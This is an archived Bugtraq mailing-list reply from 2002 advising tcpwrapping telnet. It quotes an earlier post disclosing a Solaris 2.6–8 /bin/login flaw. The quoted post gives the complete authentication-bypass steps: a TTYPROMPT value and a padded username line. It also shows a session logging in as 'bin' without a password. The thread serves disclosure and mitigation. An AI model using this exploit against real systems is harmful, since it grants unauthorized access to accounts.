[27286] in bugtraq
Re: Solaris 2.6, 7, 8
daemon@ATHENA.MIT.EDU (Ramon Kagan)
Thu Oct 3 21:48:25 2002
Date: Wed, 2 Oct 2002 13:26:59 -0400 (EDT)
From: Ramon Kagan <rkagan@YorkU.CA>
To: Jonathan S <js@APOLLO.GTI.NET>
In-Reply-To: <Pine.BSO.4.44.0210021207060.25321-100000@eurocompton.net>
Message-ID: <Pine.LNX.4.44.0210021326330.7706-100000@centaur.ccs.yorku.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Another thing, if you tcpwrap your telnet sessions, you can prevent
localhost telnets.
Ramon Kagan
York University, Computing and Network Services
Unix Team - Intermediate System Administrator
(416)736-2100 #20263
rkagan@yorku.ca
-------------------------------------
I have not failed. I have just
found 10,000 ways that don't work.
- Thomas Edison
-------------------------------------
On Wed, 2 Oct 2002, Jonathan S wrote:
> Hello,
>
> Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT. This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
> However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists. The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n". You will then be logged in as the user
> without any password authentication. This should work with any account
> except root (unless remote root login is allowed).
>
> Example:
>
> coma% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
>
> SunOS 5.8
>
> bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
> Last login: whenever
> $ whoami
> bin
>
> Jonathan Stuart
> Network Security Engineer
> Computer Consulting Partners, Ltd.
> E-mail: jons@ccpartnersltd.com
>
>
